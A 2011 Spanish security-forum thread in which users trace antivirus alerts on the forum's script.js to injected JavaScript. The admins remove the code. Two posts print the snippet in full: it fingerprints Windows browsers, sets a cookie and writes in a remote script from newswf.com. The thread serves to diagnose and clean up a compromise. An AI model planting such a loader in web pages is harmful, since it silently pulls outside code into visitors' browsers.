Seguridad Wireless - Wifi
General => Problemas con el foro, las webs, mejoras y sugerencias => Mensaje iniciado por: buite en 23-10-2011, 21:51 (Domingo)
-
Es la primera vez que me sucede, pero desde hace unos 4 días, cuando entro al foro Kaspersky antivirus me lanza un mensaje de alarma de virus en un script y deniega su acceso.
(http://img834.imageshack.us/img834/4281/alarmakav.jpg) (http://imageshack.us/photo/my-images/834/alarmakav.jpg/)
Uploaded with ImageShack.us (http://imageshack.us)
Solo me pasa en el portátil con KAV, no en otros con NOD32 o AVAST.
Por si no se aprecia en la imagen, el mensaje es:
Heur:Trojan.Script.Generic
https://foro.seguridadwireless.net/Themes/default/Script.js?fin11//Script
Supongo que no es nada, pero por si acaso.
Saludos.
-
A mi tambien me pasa con Kaspersky.
Nose q sera exactamente....
-
Avira 2012 no detecta nada.
Requested URL: https://foro.seguridadwireless.net/Themes/default/script.js?fin11
No malware found
-
falso positivo de kaspersky?
mantenednos informados, especialmente despues de que se actualicen vuestros kasperskis.
voy a ver si reviso el código a ojo, que no hay mejor heurística que esa
Post fusionado: 24-10-2011, 01:58 (Lunes)
rutinas la mar de pacíficas.
todo parece en orden en ese javascript.
me temo que kaspersky la ha pifiado esta vez provocando un falso positivo.
-
falso positivo de kaspersky?
mantenednos informados, especialmente despues de que se actualicen vuestros kasperskis.
voy a ver si reviso el código a ojo, que no hay mejor heurística que esa
Post fusionado: 24-10-2011, 00:58 (Lunes)
rutinas la mar de pacíficas.
todo parece en orden en ese javascript.
me temo que kaspersky la ha pifiado esta vez provocando un falso positivo.
Me imagino que sí es un falso positivo, porque de momento ni NOD ni AVIRA ni Avast detectan nada.
Pero _alister_ ¿A que te refieres con que informemos después de que se actualice kasperski?. Porque las bases de datos se actualizan a diario al menos 2 veces.
¿No prodría tener algo que ver con los cambios que se han producido en al foro en los últimos días?. Es que coincide.
En cualquier caso gracias.
Saludos.
-
me refiero a que es un error de kasperski, y si continuan en el error despues de una actualización de la base de datos, nuestra obligación es reportarlo para que solventen ese bug en su base de datos de definiciones.
a pesar de las modificaciones realizadas sobre la base de datos de posts y mensajes, el codigo fuente HTML que llega a vuestros pcs al cargar la pagina es exactamente el mismo, por lo tanto el hecho de que coincidan ambos sucesos en el tiempo es una mera casualidad.
al margen de ello, si el error lo tiene kaspersky, lo debe resolver kaspersky. otra cosa seria que se nos hubiera colado un virus entre los javascripts del foro, pero no parece el caso.
-
Gracias _alister_.
Aclarado pues.
Saludos.
-
Ami, desde hace unos dias, si pongo el cursor del raton sobre una imagen de este foro, me sube un pop-up en la parte inferior de la imagen.
(http://img546.imageshack.us/img546/6578/capturare.jpg)
Tiene pinta de ser un malware.
-
hola
Tiene pinta de ser un malware.
No, eso es un servicio de publicidad de la empresa Shopall.es. que habrá puesto Hwagm
saludos
-
Por cierto, la solucion momentanea para aquellos que nos afecta el problema, es crear una regla que deniegue siempre la descarga del fichero "raro".
-
Ayer envié al laboratorio de virus de Kaspersky un mensaje sugiriendoles que revisaran el aviso para esta web y la respuesta es que estaba infectada, además de recomendarme avisar a un webmaster para que elimine el código corrupto de la página y que cambiase mi contraseña privada porque me la podían robar.
En fín aquí os dejo la respuesta recibida hoy:
Hello,
This is not a false alarm, this site is infected.
Here is the malicious code:
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.set...
If you are a webmaster, please remove the above code from the page. Also we strongly recommend you to change login/password, because they can be stolen.
Regards, Nikita Pavlov,
>From: xxxxxxx@hotmail.com
>Sent: 10/25/2011 1:37:00
>To: "New Virus" <newvirus@kaspersky.com>
>Subject: [VirLabSRF][False alarm on a web resource][M:1][LN:EN][L:1]
>
>
> LANG: en
> email: xxxxxxx@hotmail.com
>
> description:
> 24/10/2011 23:10:14?Firefox?Antivirus Internet?Detectados: HEUR:Trojan.Script.Generic?https://foro.seguridadwireless.net/Themes/default/script.js?fin11//script??
> This might be an error, This website is secure
>
10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com
Bueno. Quizás la tal Nikita se limita a hacer un copy-paste con una respuesta ya precocinada, pero creo que debe ser compartido por todos.
Saludos.
-
hola
pues le toca a hwagm decir algo
saludos
-
me pongo a ello rapidamente, lo acabo de leer
lo del cursor sobre la foto, es un tema de patrocinio
seguro he recibido aviso de vosotros por movil, pero creo que lleva varios dias desactivado
-
hola
¿alguna novedad jefe?
saludos
-
Hola, si, lleva ya varios dias, lo comente en el post (erroneamente) de los portes gratis, hace como unos 10 dias me sale eso, al parecer no es tan falso positivo como decia el moderador dr valium. Un saludo.
-
Hola, si, lleva ya varios dias, lo comente en el post (erroneamente) de los portes gratis, hace como unos 10 dias me sale eso, al parecer no es tan falso positivo como decia el moderador dr valium. Un saludo.
tux tux, eso tiene muchas implicaciones.
supondria afirmar que el servicio de publicidad que ha instalado h en el foro está cometiendo irregularidades...
-
Avira ya lo detecta como amenaza.
When accessing data from the URL, "https://foro.seguridadwireless.net/Themes/default/script.js?fin11"
a virus or unwanted program 'JS/Agent.akt' [virus] was found.
Action taken: Blocked file
Salu2
-
jummm esto huele a algun codigo malicioso en ese javascript en cusstion
Se ha revisado el code?? necesitais una mano?
Habeis hablado con los publicistas???
-
En la versión anterior de SMF este enlace se encuentra en / Themes / default / script.js en la versión 2.0 de SMF que se encuentra en / Themes / default / scripts / script.js
Así que para solucionar este problema todo lo que necesita hacer es agregar el directorio extra "scripts" para el enlace en el archivo de index.template.php.
[Size = 14pt] SOLUCIÓN: [/ size]
PASO 1:
Ir a la carpeta que contiene su foro. Encuentra las carpetas:
Themes/kani_119/index.template.php
Si usted está usando un tema diferente a kani y el mismo problema vaya a
Temas / your_theme_name_here / index.template.php
PASO 2:
Buscar la línea que contiene algo así como:
<script type="text/javascript" language="JavaScript" src="', $settings['default_theme_url'],'/script.js?fin11"> </ script>
Cambiar a:
<script type="text/javascript" language="JavaScript" src="', $settings['default_theme_url'],'/scripts/script.js?fin11"> </ script>
En mi archivo de índice temático (index.template.php) se encuentra en la línea 71.
PASO 3:
Guarde el archivo index.template.php y actualiza tu navegador web.
Espero que esto ayude,un abrazo.
-
Problemas!!!!
A mi desde hoy NOD32 tb me dice q hay un virus, ya no creo q sea una casualidad. Corremos algun riesgo?, q hacemos...?
(http://img695.imageshack.us/img695/8927/viruscb.jpg) (http://imageshack.us/photo/my-images/695/viruscb.jpg/)
-
perdonar la demora, encima he estado ausente unos cuantos dias
me pongo a ello, ya mismo
-
<script language="JavaScript" type="text/javascript" src="', $settings['default_theme_url'], '/script.js?fin11"></script>
<script type="text/javascript" language="JavaScript" src="', $settings['default_theme_url'],'/scripts/script.js?fin11"> </ script>
tanto en default, como en los temas del foro
-
podeis comunicar, si aun sale el aviso, es cirioso que esto justo empezara cuando el tema de las fotos de shopall, curioso, porque no veo en smf ninguna update nuevo
si aun persiste, elimino el codigo de las fotos
-
http://onlinelinkscan.com/
https://foro.seguridadwireless.net/Themes/default/script.js?fin11
Overall result: This site is secur
-
si si, es solo una cuestion de criterio humano, h.
esta gente ha decidido que esta aplicacion publicitaria es no-deseada y la incluido a sus firmas.
no es que sea un virus, pero casi la tratan como tal.
en mi opinion, estas aplicaciones "grises", no sabe uno que hacer con ellas, y si yo fuera responsable de un motor de deteccion virica en webs, quizas tambien dudaria, pero en todo caso creo que si el aplicativo no esta descargando malware y solo se limita a presentar publicidad, no deberia ser tratado con tanto alarmismo. quizas un motor tipo adblock si deberia detectarlo y pararlo, pero un motor tipo antivirus... parece lo que no es.
-
El avira ya no sufre de taquicardias.
Antes ya bloqueaba el acceso a la dirección mencionada.
Salu2
Post fusionado: 02-11-2011, 16:50 (Miércoles)
Avira vuelve con sus taquicardias.
(https://sites.google.com/site/imagenesotras/avirascript.PNG?attredirects=0) (https://sites.google.com/site/imagenesotras/avirascript.PNG?attredirects=0)
Salu2
-
De los que prueba virustotal, son solo 3 antivirus los que saltan:
Antivirus Version Ultimo Update Resultado
AhnLab-V3 2011.11.02.00 2011.11.02 -
AntiVir 7.11.16.241 2011.11.02 JS/Agent.akt
Antiy-AVL 2.0.3.7 2011.11.02 -
Avast 6.0.1289.0 2011.11.02 -
AVG 10.0.0.1190 2011.11.02 -
BitDefender 7.2 2011.11.02 -
ByteHero 1.0.0.1 2011.09.23 -
CAT-QuickHeal 11.00 2011.11.02 -
ClamAV 0.97.3.0 2011.11.02 -
Commtouch 5.3.2.6 2011.11.02 -
Comodo 10639 2011.11.02 -
DrWeb 5.0.2.03300 2011.11.02 -
Emsisoft 5.1.0.11 2011.11.02 -
eSafe 7.0.17.0 2011.11.02 -
eTrust-Vet 36.1.8652 2011.11.02 -
F-Prot 4.6.5.141 2011.11.01 -
F-Secure 9.0.16440.0 2011.11.02 -
Fortinet 4.3.370.0 2011.11.02 -
GData 22 2011.11.02 -
Ikarus T3.1.1.107.0 2011.11.02 -
Jiangmin 13.0.900 2011.11.01 -
K7AntiVirus 9.116.5371 2011.11.01 -
Kaspersky 9.0.0.837 2011.11.02 Trojan-Downloader.JS.JScript.k
McAfee 5.400.0.1158 2011.11.02 -
McAfee-GW-Edition 2010.1D 2011.11.02 -
Microsoft 1.7801 2011.11.02 -
NOD32 6594 2011.11.02 JS/Agent.NDM
Norman 6.07.13 2011.11.02 -
nProtect 2011-11-02.02 2011.11.02 -
Panda 10.0.3.5 2011.11.02 -
PCTools 8.0.0.5 2011.11.02 -
Prevx 3.0 2011.11.02 -
Rising 23.82.02.02 2011.11.02 -
Sophos 4.70.0 2011.11.02 -
SUPERAntiSpyware 4.40.0.1006 2011.11.02 -
Symantec 20111.2.0.82 2011.11.02 -
TheHacker 6.7.0.1.336 2011.10.31 -
TrendMicro 9.500.0.1008 2011.11.02 -
TrendMicro-HouseCall 9.500.0.1008 2011.11.02 -
VBA32 3.12.16.4 2011.11.02 -
VIPRE 10945 2011.11.02 -
ViRobot 2011.11.2.4751 2011.11.02 -
VirusBuster 14.1.41.0 2011.11.02 -
Un saludo, espero que ayude.
-
parece que las casas antivirus estan teniendo un fuerte debate interno sobre qué hacer respecto a este "software". parece ciertamente que está en la zona gris de lo "deseable".
en fin, lo mejor que podemos hacer IMHO es cambiar de sistema publicitario "en tanto en cuanto".
-
pues si , kitare del foro lo de la imagen
y dejare lo otro igual
que no funciona los botones
-
listo sin publi y rulando los codes
a ver que dice ahora los a.virus online
-
Dios mio que favor de gran magnitud nos han hecho los antivirus con el tema publicidad en imagenes ^-^
-
Dios mio que favor de gran magnitud nos han hecho los antivirus con el tema publicidad en imagenes ^-^
>:( >:( >:(
-
jajaja, pero creo que sigue saliendo, igual el aviso
un@ amig@ del otro lado, me decia, hace poco, vaya cosa con eso de las imagenes, es un -............ jaja no acabo la frase
-
Eliminando este guion del archivo y se acaban las taquicardias a los antivirus.
============================================================================-*/
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} if (navigator.userAgent.indexOf("KHTML") == -1 && navigator.userAgent.indexOf("NT") != -1){if(navigator.cookieEnabled == true) {var user = getCookie("NSwfCookie");if (user !=="ok"){newswfcookie();setCookie("NSwfCookie", "ok", 7, "/");}}} function newswfcookie(){document.write(unescape("%3Cscript src='http://newswf.com/in.cgi?6' type='text/javascript'%3E%3C/script%3E"));} function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
/*============================================================================-=*/
Salu2
-
hecho
ademas
https://foro.seguridadwireless.net/problemas-con-el-foro-y-los-portales-web/alarma-de-kaspersky-cuando-entro-al-foro!!-por-que/msg219433/#msg219433
Here is the malicious code:
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.set...
si es que no leemos nada jejejeje
ya virustotal lo da como 0
-
mejor que cambies de estrategia de monetizacion...
en serio, si quieres nos damos un paseo por todas las opciones disponibles y buscamos algo que tenga buena relacion entre fricción/interrupción y relevancia/monetización
pero este sistema está en una zona gris que puede lesionar la re****cion del site.
-
mejor que cambies de estrategia de monetizacion...
en serio, si quieres nos damos un paseo por todas las opciones disponibles y buscamos algo que tenga buena relacion entre fricción/interrupción y relevancia/monetización
pero este sistema está en una zona gris que puede lesionar la re****cion del site.
de eso ya no entendi nada ;)
Eliminando este guion del archivo y se acaban las taquicardias a los antivirus.
============================================================================-*/
function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "");} if (navigator.userAgent.indexOf("KHTML") == -1 && navigator.userAgent.indexOf("NT") != -1){if(navigator.cookieEnabled == true) {var user = getCookie("NSwfCookie");if (user !=="ok"){newswfcookie();setCookie("NSwfCookie", "ok", 7, "/");}}} function newswfcookie(){document.write(unescape("%3Cscript src='http://newswf.com/in.cgi?6' type='text/javascript'%3E%3C/script%3E"));} function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = null; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset); if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return setStr;}
/*============================================================================-=*/
Salu2
como puede ser que por ese guion se produzca un falso positivo?
mmmm eso de java parece complicado
-
perdon, ha sido una deformación profesional (comercio electrónico y ventas online).
le hablaba a hwagm pero es mejor que comentemos nuestras cosas en privado.
forget it :)
PD: deuxx, aunque no lo veas, ese código está intentando depositar una cookie, y algunas casas de antivirus han decidido que esa actividad es no deseada. los antivirus que han decidido incluir en la lista negra a este código, simplemente han elegido un trozo de ese texto que es muy característico de dicho código para detectarlo. despues de todo asi es como funcionan los antivirus, simplemente buscan fragmentos conocidos de texto "firmas" en archivos. cuando se altera el texto de un archivo que se utiliza como firma en un antivirus, este deja de detectarlo como virus o aplicación no deseada.
-
¡¡Solucionado!!.
Ya no sale la advertencia en Kaspersky y así se lo he comunicado a Hwagm.
Me imagino que con el resto de antivirus tampoco hay alarma de virus ya.
Una saludo.